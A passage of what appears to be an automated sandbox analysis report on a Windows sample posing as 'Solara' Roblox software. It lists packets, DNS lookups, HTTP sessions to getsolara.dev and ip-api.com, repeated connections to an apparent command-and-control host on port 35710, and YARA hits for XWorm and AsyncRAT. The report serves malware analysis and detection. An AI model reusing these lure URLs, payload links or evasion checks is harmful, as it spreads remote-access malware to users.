                                                                                                                                                                                                    Dec 20, 2024 19:03:24.585844994 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:24.585901976 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:24.586652994 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.336843967 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.336873055 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.337240934 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.337476015 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.337488890 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.572078943 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.572182894 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575414896 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575426102 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575853109 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.577126026 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.623323917 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.264781952 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.264889002 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.265331984 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.266123056 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.051162004 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.170654058 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.170839071 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.233340025 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.353702068 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:32.982279062 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:32.982343912 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:04:35.493376017 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:35.497354984 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.671601057 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.673588037 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.791157007 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.793066978 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.793143988 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.816638947 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.937304020 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:50.968236923 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:51.087980986 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:00.343728065 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:05:00.463217974 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:02.097227097 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:02.217751980 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:13.238663912 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:13.358995914 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:17.037026882 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:17.037373066 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.107284069 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.109093904 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.226924896 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.228636980 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.228734016 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.264345884 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.384624004 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:22.723190069 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:22.844368935 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:23.549030066 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:23.549089909 CET4983835710192.168.2.8147.185.221.18

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.092793941 CET5281753192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.230163097 CET53528171.1.1.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.954171896 CET5236753192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.092135906 CET53523671.1.1.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.157427073 CET5310153192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.295531034 CET53531011.1.1.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.186937094 CET6130553192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.335366964 CET53613051.1.1.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.266953945 CET6374553192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.405214071 CET53637451.1.1.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:29.788145065 CET6536453192.168.2.81.1.1.1
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.047128916 CET53653641.1.1.1192.168.2.8

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.092793941 CET192.168.2.81.1.1.10x2091Standard query (0)getsolara.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.954171896 CET192.168.2.81.1.1.10xa3a9Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.157427073 CET192.168.2.81.1.1.10x87f5Standard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.186937094 CET192.168.2.81.1.1.10xbb4cStandard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.266953945 CET192.168.2.81.1.1.10x32cfStandard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:04:29.788145065 CET192.168.2.81.1.1.10xa9e5Standard query (0)hope-asia.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.230163097 CET1.1.1.1192.168.2.80x2091No error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.230163097 CET1.1.1.1192.168.2.80x2091No error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.092135906 CET1.1.1.1192.168.2.80xa3a9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.295531034 CET1.1.1.1192.168.2.80x87f5No error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.295531034 CET1.1.1.1192.168.2.80x87f5No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.295531034 CET1.1.1.1192.168.2.80x87f5No error (0)edge-term4.roblox.comedge-term4-fra2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.295531034 CET1.1.1.1192.168.2.80x87f5No error (0)edge-term4-fra2.roblox.com128.116.123.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.335366964 CET1.1.1.1192.168.2.80xbb4cNo error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.335366964 CET1.1.1.1192.168.2.80xbb4cNo error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.405214071 CET1.1.1.1192.168.2.80x32cfNo error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.405214071 CET1.1.1.1192.168.2.80x32cfNo error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.047128916 CET1.1.1.1192.168.2.80xa9e5No error (0)hope-asia.gl.at.ply.gg147.185.221.18A (IP address)IN (0x0001)false

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • getsolara.dev
                                                                                                                                                                                                    • clientsettings.roblox.com
                                                                                                                                                                                                    • www.nodejs.org
                                                                                                                                                                                                    • ip-api.com

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.849706208.95.112.1805560C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.219291925 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.315226078 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 20 Dec 2024 18:03:19 GMT
                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.849704104.21.93.274436476C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-20 18:03:17 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                                                                                                                                    Host: getsolara.dev
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-12-20 18:03:18 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 20 Dec 2024 18:03:17 GMT
                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                    Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                    ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdFcZxxzvmop8nol5fgp3uP7UqiHsdhZS6TAbZCFpKSff2vt%2F4W4oAJRlx1a16BLSarNyOSVsfFQ8HgVeB7fJ41ChvU213THPUT9w4KgeKHJYXZy4%2FUSgtkgCQz%2ByhYV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                    Strict-Transport-Security: max-age=0
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8f518c5c58bd8c0c-EWR
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1926&rtt_var=735&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2812&recv_bytes=695&delivery_rate=1474747&cwnd=206&unsent_bytes=0&cid=59bb1cc31079636b&ts=531&x=0"
                                                                                                                                                                                                    2024-12-20 18:03:18 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                                                                                                                                    Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                                                                                                                                    2024-12-20 18:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.849707104.21.93.274436476C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-20 18:03:21 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                                                                                                                                    Host: getsolara.dev
                                                                                                                                                                                                    2024-12-20 18:03:21 UTC1046INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 20 Dec 2024 18:03:21 GMT
                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                    Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                    ETag: W/"75d0cd5c955470ce04c6372b65c32d37"
                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k2ASba77%2F7NV11AQvHGkjzE8biSE4gKGm2vo7%2BDjr8yhzfEm92fFzoRGC%2F92%2B4kTiNXDzBr28BEnRslh2CJxY2nBUNVLhMjkT6xgVwGheD0iOOQpfHisNPqFaktHsEO6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                    Strict-Transport-Security: max-age=0
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8f518c74fc4b8cca-EWR
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1839&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=694&delivery_rate=1577525&cwnd=239&unsent_bytes=0&cid=2b7fff29c95e903c&ts=481&x=0"
                                                                                                                                                                                                    2024-12-20 18:03:21 UTC323INData Raw: 32 31 34 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 33 32 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 38 35 62 31 62 30 37 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                                                    Data Ascii: 214{ "BootstrapperVersion": "1.23", "SupportedClient": "version-b71c150c7c1f40de", "SoftwareVersion": "3.132", "BootstrapperUrl": "https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                                                                                                                                    2024-12-20 18:03:21 UTC216INData Raw: 2e 7a 69 70 22 2c 0a 20 20 20 20 22 56 65 72 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 33 30 39 64 66 65 34 38 30 32 62 36 33 30 65 36 61 38 66 32 37 32 33 36 34 38 38 39 66 63 66 31 65 63 36 61 32 39 62 39 63 63 37 31 64 62 34 39 36 65 62 36 33 34 33 39 36 64 33 63 36 39 63 61 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 22 0a 7d 0d 0a
                                                                                                                                                                                                    Data Ascii: .zip", "VersionUrl":"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"309dfe4802b630e6a8f272364889fcf1ec6a29b9cc71db496eb634396d3c69ca", "Changelog":"[+]"}
                                                                                                                                                                                                    2024-12-20 18:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.849708128.116.123.34436476C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-20 18:03:23 UTC119OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                                                                                                                                                                    Host: clientsettings.roblox.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-12-20 18:03:24 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                    content-length: 119
                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                    date: Fri, 20 Dec 2024 18:03:23 GMT
                                                                                                                                                                                                    server: Kestrel
                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                    roblox-machine-id: f63ffcfa-7b47-275e-eed1-ddb7c5532dc8
                                                                                                                                                                                                    x-roblox-region: us-central_rbx
                                                                                                                                                                                                    x-roblox-edge: fra2
                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                                                                                                                                                                                    connection: close
                                                                                                                                                                                                    2024-12-20 18:03:24 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 34 2e 31 2e 36 35 34 30 34 37 37 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 31 2c 20 36 35 34 30 34 37 37 22 7d
                                                                                                                                                                                                    Data Ascii: {"version":"0.654.1.6540477","clientVersionUpload":"version-b71c150c7c1f40de","bootstrapperVersion":"1, 6, 1, 6540477"}


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.849709104.20.22.464436476C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-20 18:03:27 UTC99OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                                                                                                                                                                    Host: www.nodejs.org
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-12-20 18:03:28 UTC497INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                    Date: Fri, 20 Dec 2024 18:03:28 GMT
                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                    location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                    x-vercel-id: iad1::t7h44-1734717808094-cd253c9d17c5
                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8f518c9af890431a-EWR
                                                                                                                                                                                                    2024-12-20 18:03:28 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: fRedirecting...
                                                                                                                                                                                                    2024-12-20 18:03:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:13:03:12
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\YgJ5inWPQO.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7ff580000
                                                                                                                                                                                                    File size:7'714'025 bytes
                                                                                                                                                                                                    MD5 hash:ABBB4A5A77F9CF1530D24710A621026C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\YgJ5inWPQO.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7ff580000
                                                                                                                                                                                                    File size:7'714'025 bytes
                                                                                                                                                                                                    MD5 hash:ABBB4A5A77F9CF1530D24710A621026C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
